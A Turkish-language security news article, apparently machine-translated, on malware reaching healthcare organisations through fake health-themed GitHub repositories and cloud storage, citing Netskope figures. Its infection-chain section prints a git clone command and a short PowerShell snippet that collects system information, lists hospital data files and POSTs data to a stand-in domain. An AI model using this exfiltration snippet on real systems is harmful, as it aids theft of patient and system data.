Sağlık sektörü, 2025’te siber saldırılar için ana hedef olarak ortaya çıkıyor


Sağlık sektörü, 2025'te siber saldırılar için ana hedef olarak ortaya çıkıyor

Sağlık endüstrisi, 2025’te sofistike siber tehditlere giderek daha savunmasız hale geldi ve kötü niyetli aktörler özellikle tıbbi kurumların büyüyen bulut altyapısını ve dijital iş akışlarını hedefliyor.

Son bulgulara göre, tehdit aktörleri taktiklerini, kötü amaçlı yazılım dağıtımı için birincil vektörler olarak güvenilir bulut platformlarından yararlanarak sağlık güvenlik ekipleri için eşi görülmemiş zorluklar yarattı.

Bu stratejik pivot, sektörün hızlı dijital dönüşümünden ve hasta bakımı ve idari operasyonlar için bulut tabanlı çözümlere olan güvenini artırır.

Google Haberleri

Github beklenmedik bir şekilde sağlık kuruluşlarını hedefleyen kötü amaçlı yazılım dağıtımının önde gelen platformu olarak ortaya çıkmıştır ve sektördeki kurumların% 13’ü platformdan kötü amaçlı yazılım indirmeleri yaşıyor.

Tehdit aktörleri GitHub’ın geliştiriciler ve BT profesyonelleri arasındaki yaygın güveninden yararlandığından, saldırı metodolojisinde önemli bir evrimi temsil eder.

Platformun açık doğası ve meşru iş kullanımı, kötü amaçlı kod için mükemmel bir kamuflaj oluşturarak saldırganların geleneksel güvenlik kontrollerini atlamasına olanak tanır.

Netskope araştırmacıları, saldırganların özellikle sağlık hizmetleriyle ilgili kalkınma projeleri veya araçları olarak görünecek şekilde tasarlanmış Github depoları hazırladıkları bir model belirlediler.

Netskope tehdit laboratuvarlarının baş güvenlik araştırmacısı Dr. Elena Kaprov, “Sağlık hizmetine özgü terminoloji ve meşru tıbbi yazılım projelerini yakından taklit eden marka ile depolar oluşturan sofistike tehdit aktörlerini gözlemledik” dedi.

“Bu depolar, indirildikten sonra planlanan görevler ve kayıt defteri değişiklikleri yoluyla kalıcılık oluşturan silahlandırılmış kod içeriyor.”

Github’ın yaygınlığını takiben, saldırganlar Microsoft OneDrive, Amazon S3 ve Google Drive’ı kötü amaçlı yazılım dağıtım kanalları olarak kullanıyorlar.

Bu platformlar, dosyalardan indirildiğinde nadiren güvenlik uyarılarını tetikleyen standart iş araçlarını temsil ettikleri için organizasyonel ortamlardaki doğal güvenden yararlanır.

Saldırganların metodolojisi, sağlık iş akışlarını ve güvenlik kör noktalarını derinlemesine anlıyor.

Bu saldırıların etkisi önemli olmuştur ve veri politikası ihlalleri giderek yaygınlaşmıştır.

Sağlık kuruluşlarındaki tüm veri politikası ihlallerinin% 81’i şaşırtıcı bir şekilde, HIPAA gibi düzenlemeler kapsamında ciddi uyum ve gizlilik kaygıları sunarak düzenlenmiş hasta verilerini içerir.

Github enfeksiyon zinciri analizi

Enfeksiyon zinciri, Healthcare BT personeli veya geliştiricileri sağlıkla ilgili belirli kod depolarını aradığında başlar.

Saldırganlar, bu aramalarda görünmek için sağlık hizmetlerine özgü anahtar kelimelerle kötü niyetli depolarını optimize eder. Bir kurban depoyu keşfettiğinde, genellikle standart git komutlarını kullanarak klonlarlar:-

git clone https://github.com/healthcare-tools/patient-data-analyzer.git

İndirilen kodun yürütülmesi üzerine, kötü amaçlı yazılım, iyi huylu görünen ancak aslında komut ve kontrol oluşturan PowerShell komutlarını kullanarak bir başlangıç ​​sistem taraması gerçekleştirir:-

$sysInfo = Get-WmiObject -Class Win32_OperatingSystem
$healthcareData = Get-ChildItem -Path "C:\Hospital\" -Recurse -Include *.dat
Invoke-WebRequest -Uri "https://legitimate-looking-domain.com/api" -Method POST -Body $sysInfo

Bu sofistike yaklaşım, saldırganların kritik sağlık hizmeti altyapısına erişirken güvenlik önlemlerini atlamalarını sağlar.

Kuruluşlar, güvenilir depolara bile erişirken katı kod inceleme politikaları uygulayarak ve uzak tarayıcı izolasyon teknolojisini kullanarak kendilerini koruyabilirler.

Are you from the SOC and DFIR Teams? – Analyse Real time Malware Incidents with ANY.RUN -> Start Now for Free.



Source link